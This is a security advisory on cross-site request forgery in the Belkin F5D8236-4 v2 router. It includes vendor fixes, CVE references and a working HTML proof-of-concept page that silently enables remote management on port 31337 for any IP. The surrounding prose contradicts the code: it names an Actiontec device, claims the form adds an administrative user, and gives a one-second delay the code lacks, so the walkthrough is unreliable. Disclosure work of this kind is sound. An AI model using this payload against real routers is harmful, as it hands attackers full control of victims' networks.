Taking over the Belkin F5D8236-4 v2

[return to summary]

Details

All HTML forms present in the Belkin F5D8236-4 v2 are susceptible to Cross-Site Request Forgery.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.

Recommendations to the vendor

  • Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP refferer checking should be enabled.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attack, we assume that an Actiontec device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the administrator's router, from the administrator's browser. Since the administrator has a current session established with the Actiontec router, the form submissions are processed.

The first form (Figure 1) is pre-filled out with the information required to add a new administrative user to the router. The form is automatically submitted after a 1 second delay, and the victim's browser is then redirected to a second page.


<html>

<head>
<title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title>
<!-- Use JavaScript debugging to bypass authentication -->
<!--*Discovered by: Jacob Holcomb 
	- Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" 
	method="post"/>
<input type="hidden" name="remote_mgmt_enabled" value="1"/>
<input type="hidden" name="remote_mgmt_port" value="31337"/>
<input type="hidden" name="allow_remote_ip" value="0"/>
</form>

<script>
function BeLkIn() {document.belkin.submit();}; 
window.setTimeout(BeLkIn, 0000);
</script>

<body>
</html>

Figure 1. Attack page 1.

At this point, the attacker can remotely administer, and thereby remotely control the router.

References

  • CVE-2013-3083: Cross Site Request Forgery
  • CVE-2013-3084: Cross-Site Scripting
  • CVE-2013-3085: Authentication Bypass

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io